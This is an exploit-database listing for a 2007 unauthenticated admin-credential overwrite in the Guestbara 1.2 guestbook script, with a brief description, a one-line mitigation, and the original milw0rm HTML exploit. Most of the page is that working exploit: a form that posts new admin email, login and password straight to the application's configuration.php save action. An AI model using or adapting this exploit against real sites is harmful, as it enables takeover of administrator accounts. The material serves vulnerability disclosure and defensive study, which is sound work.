Guestbara - exploit.company

vendor:

Guestbara

by:

Kacper

N/A

CVSS

N/A

Change admin login & password exploit

CWE

Product Name: Guestbara

Affected Version From: <= 1.2

Affected Version To: <= 1.2

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Guestbara <= 1.2 Change admin login & password exploit

This exploit allows an attacker to change the admin login and password in Guestbara version 1.2. The attacker can modify the admin email, admin name, and admin password through a form submission. The exploit is performed by sending a POST request to the configuration.php file with the necessary parameters.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Guestbara or implement strong access controls and secure password policies.

Source

Exploit-DB raw data:

<html>
<title>Guestbara &lt;= 1.2 Change admin login & password exploit by Kacper</title>
<table border=0 cellspacing=0 cellpadding=0 align='center'>

<form method='post' action='http://127.0.0.1/guestbook_path/admin/configuration.php?action=saveconfig&zapis=ok'><tr>

<tr><td width=200>Admin Email</td><td><input type='text' name='admin_mail' class='textfield' value=''></td></tr>
<tr><td width=200>Admin Name</td><td><input type='text' name='login' class='textfield' value=''></td></tr>
<tr><td width=200>Admin Pass</td><td><input type='password' name='pass' class='textfield' value=''></td></tr>
<tr><td  colspan=2 align=center>
  <p>
    <input type='submit' name='submit' value='Zachowaj'>
  </p>
  <p>by Kacper  </p>
  <p>for</p>
  <p><a href="http://www.rahim.webd.pl/" target="_blank">DEVIL TEAM </a></p></td></tr>
</form></table>
<p>&nbsp;</p>
<p align="center">script download: http://www.hotscripts.pl/produkt-3051.html</p>
<p align="center">Greetz @ll DEVIL TEAM </p>
</html>

# milw0rm.com [2007-03-18]